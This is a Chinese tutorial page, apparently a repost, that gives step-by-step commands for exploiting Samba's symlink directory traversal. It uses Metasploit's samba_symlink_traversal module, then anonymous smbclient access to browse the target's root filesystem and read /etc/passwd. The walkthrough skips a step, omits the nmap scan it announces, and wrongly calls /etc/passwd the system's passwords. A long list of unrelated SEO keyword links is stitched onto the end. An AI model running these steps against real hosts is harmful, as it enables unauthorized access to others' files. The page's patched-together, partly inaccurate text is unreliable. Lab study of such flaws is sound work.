Metasploit溢出samba提权漏洞
发表于:2024-11-18 作者:千家信息网编辑
千家信息网最后更新 2024年11月18日,Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过
千家信息网最后更新 2024年11月18日Metasploit溢出samba提权漏洞
Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。
一、利用nmap工具扫描目标主机
1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择"在终端中打开"。
1.3在终端中输入命令"msfconsole",启动MSF终端。
1.4在终端中输入命令"search samba",搜索samba的相关工具和***载荷。
1.5在终端中输入命令"use auxiliary/admin/smb/samba_symlink_traversal",启用漏洞利用模块, 提示符就会提示进入到该路径下。
1.6在终端中输入命令"info",查看需要设置的相关项,"yes"表示必须填写的参数。
1.7在终端中输入命令"set RHOST 192.168.1.3",设置目标主机的IP地址。
1.8在终端中输入"set SMBSHARE tmp", 设置SAM可写文件。
1.9在终端中输入"exploit", 开始***。
1.10新打开一个终端,输入"smbclient //192.168.1.3/tmp",直接回车,不用输入密码。
1.11在终端中输入"cd rootfs", 进入rootfs目录,在终端下输入命令"ls",列出目录。
1.12在终端中输入"more /etc/passwd", 查看目标主机系统中的密码。
终端
输入
命令
目录
主机
文件
目标
漏洞
密码
工具
提示
对称
不用
参数
可以通过
地址
提示符
桌面
模块
用户
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
网络安全主题班会学校
2018护苗网络安全手抄报
我国网络安全突出问题
java服务器启动占内存
网络技术支持季度总结
重庆口碑好的软件开发技术怎么样
我的世界人数最少的服务器
免安装非管理员的数据库
r730服务器跳线
MongoDB数据库 表单
2021年北京市网络安全大会
软件开发的高级技术员
网络安全领域的中文核心
江苏时代网络技术分类服务标准
软件开发自学步骤java
国家实行网络安全保护登记制度
安康越桨网络技术有限公司
日照鹏昇网络技术有限公司
linx是虚拟服务器吗
地铁计算机网络技术好吗
数据库并发写覆盖新数据
数据库的对象是什么
烟台招聘软件开发工程师
高中生学软件开发哪个学校好
政府办公室网络安全管理制度
怎么组装服务器
存储服务器批量更换
产业互联网金融科技主战场
软件开发部职责
数据库的配置库是什么